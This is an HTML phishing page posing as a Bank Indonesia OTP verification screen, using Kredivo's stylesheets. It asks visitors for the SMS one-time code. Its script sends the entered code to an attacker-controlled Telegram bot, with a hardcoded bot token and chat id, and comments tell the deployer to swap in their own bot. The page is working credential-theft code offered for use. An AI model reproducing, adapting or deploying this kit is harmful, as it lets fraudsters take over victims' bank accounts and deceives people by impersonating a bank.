<html><head><meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Bank Indonesia</title><link rel="shortcut icon" href="https://banner2.cleanpng.com/20180429/jbq/kisspng-bank-indonesia-bank-mandiri-bank-rakyat-indonesia-5ae67649de2422.3744481215250530019099.jpg"><link href="https://pay.kredivo.com/css/main.css" rel="stylesheet">
<link href="https://api.kredivo.com/static/css/bootstrap.min.css" rel="stylesheet">
<link href="https://api.kredivo.com/static/css/font-awesome.css" rel="stylesheet">
<link href="https://api.kredivo.com/static/css/kredivo.css" rel="stylesheet">
</head>
<body style="background-color: #F8F8F8;">
<form>
<center>
<img src="https://st3.depositphotos.com/7662228/16527/v/450/depositphotos_165274916-stock-illustration-white-envelope-letter-with-counter.jpg" alt="" width="100" height="180" loading="lazy" style="top:0%;left:0%;width:100%;l:180%;position: center;">
<h6 style="padding: 0px 15px;">SMS Kode otp telah kami kirimkan ke nomor handphone anda, silahkan cek lalu masukkan pada kolom dibawah</h6>
<br>
<input type="tel" id="nomor" style="box-sizing: border-box; height: 35px; width: 330px; max-width: 100%; border: 0.5px solid rgb(0, 134, 224); border-radius: 5px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; padding: 0px 12px;" placeholder="Kode OTP" maxlength="16" minlength="16" required=""/>
<br>
<input type="button" id="KIRIM" style="margin: 0 auto; width: 330px; min-height: 40px; background-color: #1d66ab; margin-top: 13%; padding: 3px; border: solid #e2d7a2 1px; border-radius: 5px; font-color: #fff; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 14px; padding: 0px 12px; margin: 30px auto;" value="Lanjut" onclick="Redirect()"/>
</center>
</form> 
<footer> </footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
    function Redirect() {
  window.location = "otp.html"

    var input = document.getElementById('nomor');

    var input = 'Form DATA%0A' +  '%0AKode OTP %3A ' + nomor.value

    var token = '6233878134:AAFevlCn1JsA6zjW-6UGI-zaISxZVkXeGn4'; // Ganti dengan token bot yang kamu buat
    var grup = '5875486632'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${input}&parse_mode=html`,
        method: `POST`,
        
    })
}
</script></body></html>